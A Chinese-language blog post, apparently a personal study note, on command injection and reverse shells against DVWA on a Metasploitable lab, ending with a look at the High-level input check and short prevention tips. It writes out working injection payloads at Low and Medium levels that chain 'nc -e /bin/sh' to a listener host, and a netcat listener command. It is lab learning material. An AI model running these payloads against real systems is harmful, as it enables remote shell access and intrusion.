追蹤

Kuro的理財與資安學習路

喜歡分享事物與認識朋友,對資訊安全盡一點心力。期待能保持著定期參與資安社群活動。並能在人生的理財投資上有所成長。

Metasploitable 學習筆記-DVWA Command injection 命令注入攻擊與 Reverse Shell


原文寫在我的 Medium  貼在這裡有些跑版 ~

也感謝過往打賞支持的讀者,謝謝!!

--------

其他有關金融、網路的可以參考 這裡


Metasploitable 學習筆記-DVWA Command injection 命令注入攻擊與 Reverse Shell

這是一篇系列文,有關看一些不同的Metasploitable介紹與教學的練習紀錄

什麼是Command injection

根據OWASP解釋:

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.

簡單說就是透過主機系統上的程序執行任意命令

指令

常見的指令有幾個

  • ;能夠直接執行第二個命令
  • && 第一個指令成功後執行第二個
  • || 第一個指令失敗後執行第二個

Low 等級

執行ping與ls看看,先使用ping 8.8.8.8與; 嘗試執行指令

Reverse Shell

看來我們的command execution成功了,試著Revsrse看看

  • 使用nc 監聽(Netcat)
nc -vv -l -p 8080

nc [詳細輸出] [監聽] [port] 8080

  • 使用bin sh或bin bash
nc -e /bin/sh [ip] 8080

執行Reverse Shell

  1. 在Kali執行nc -vv -l -p 8080
  2. 在網頁執行nc -e /bin/sh [ip] 8080
  3. 執行指令
nc -vv -l -p 8080
8.8.8.8;nc -e /bin/sh 192.168.40.128 8080

Medium 等級

使用 | 指令

| : 第一個命令的輸出當作下一個命令的輸入

參考教學:

# cat /etc/passwd | grep /bin/bash | wc -l
利用第一个管道将cat命令(显示passwd文件的内容)的输出送给grep命令,grep命令找出含有“/bin /bash”的所有行;第二个管道将grep的输出送给wc命令,wc命令统计出输入中的行数。这个命令的功能在于找出系统中有多少个用户使用bash。

執行命令

8.8.8.8 | nc -e /bin/sh 192.168.40.128 8080

High等級

高級部分應該bypass不了(或是我解不開),我們點選View Source Code看一下內容:

// Split the IP into 4 octects 
 $octet = explode(“.”, $target);

這段程式碼將IP給拆開處理,例如:

255.255.255.255  --- [255, 255, 255, 255]
// Check IF each octet is an integer 
 if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {

當我們用指令或空白時候跳到這段如果不是數字就會出錯,確保每個輸入不會有其他的字串之類

預防

  • 不要讓使用者用危險的指令
  • 正規表達式過濾處理

 

 
 

本文章發表於:科技

加入43

Kuro的理財與資安學習路

國立臺北商業大學 資訊管理學

追蹤 105 鼓勵作者

喜歡分享事物與認識朋友,對資訊安全盡一點心力。期待能保持著定期參與資安社群活動。並能在人生的理財投資上有所成長。

鼓勵作者

目前持有 Blink Coin: Loading..

選擇禮物


愛心

(Coin 10)

幫高調

(Coin 20)

咖啡

(Coin 30)

掌聲鼓勵

(Coin 40)

崇拜眼神

(Coin 50)

驚呆了

(Coin 60)

神人4ni

(Coin 70)

花束

(Coin 100)

鑽石

(Coin 300)

紅寶石

(Coin 500)

藍寶石

(Coin 1000)

黃寶石

(Coin 3000)


送出鼓勵



發表匿名文章不會出現你的大頭圖與名稱,你可暢所欲言,但文章內容務必遵守「佈告欄使用規範」!


回應

送出回應


想回應這篇文章嗎?也想發表文章嗎?
馬上登入來發表文章、追蹤作者、收藏文章或回應文章吧!

註冊 登入